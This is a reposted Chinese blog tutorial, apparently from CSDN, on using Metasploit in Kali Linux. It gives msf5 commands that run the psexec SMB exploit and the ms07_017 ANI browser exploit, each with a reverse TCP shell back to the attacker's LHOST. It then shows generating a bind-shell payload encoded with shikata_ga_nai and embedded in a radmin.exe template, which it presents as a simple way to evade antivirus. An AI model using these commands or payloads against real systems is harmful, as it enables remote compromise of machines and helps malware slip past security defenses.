payload模块怎Linux,kali linux之Msf-exploit模块,生成payload

本文详细介绍了Metasploit框架中主动Exploit(如windows/smb/psexec)和被动Exploit(如windows/browser/ms07_017_ani_loadimage_chunksize)的使用方法,包括设置目标主机、端口、用户及密码,以及生成Payload的过程。同时,讲解了如何通过编码和模板生成免杀Payload,以绕过防护系统。
摘要由CSDN通过智能技术生成

Exploit模块

Active exploit(主动地向目标机器发送payload并执行,使目标交出shell(反连等))

msf5 > use exploit/windows/smb/psexec

msf5 exploit(windows/smb/psexec) > set RHOST 192.168.1.13

msf5 exploit(windows/smb/psexec) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.10

msf5 exploit(windows/smb/psexec) > set LPORT 4444

msf5 exploit(windows/smb/psexec) > set SMBUSER admi1

msf5 exploit(windows/smb/psexec) > set SMBPASS 123

msf5 exploit(windows/smb/psexec) > exploit -j

Passive exploit(利用目标机器的客户端程序的漏洞来利用,客户端程序请求服务端时候,返回漏洞代码,加载payload,交出shell)

msf5 > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set SRVHOST 192.168.1.10

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.10

msf5 exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit -j

生成Payload

dd3a5d5a65f1601f605e6ef6c20d5a3b.png

generate

用法:生成  [选项]

选项:

-E             强制编码

-O            不推荐使用:'-o'选项的别名

-P             所需的有效负载总大小,自动生成适当的NOPsled长度

-S             生成Windows二进制文件时使用的新节名称

-b             要避免的字符列表示例:'\x00\xff'

-e             要使用的编码器

-f              输出格式:bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war

-h            显示此消息

-i             对有效负载进行编码的次数

-k            保留模板行为并将有效负载注入新线程

-n            在有效负载上添加[length]大小的nopsled

-o            输出文件名(否则为stdout)

-p            有效负载的平台

-s            NOP长度,EIP返回到存储NOP sled的任意地址时将递增,最终导致shellcode执行

-x            指定要用作模板的自定义可执行文件

generate---生成payload(这样生成的payload会有坏字符)

0b371d270de73f7b7d060ec2956567c2.png

encoders---generate生成payload的时候会智能的去选择encoders

04716215df9bf0d02990cc3a7f1a0c7c.png

generate -b '\x00'

47ae1f6db147cda8701f7615e3c7e512.png

generate -b '\x00\xff'

28f087ff980edefd63967aa151b6aebb.png

msf5 payload(windows/shell_bind_tcp) > generate -b '\x00' -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o /root/xx.exe(经过编码或者使用模板,可以简单的免杀)

898caf4e854e36bf03f20bada9fc23e9.png

dae9922831c35fd7fbc48b0deac0c168.png

额........比没混淆前好多了

02a1f1535cb7bffefbdcf0b32a8ea215.png

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

来源:https://www.cnblogs.com/Hydraxx/p/10488300.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值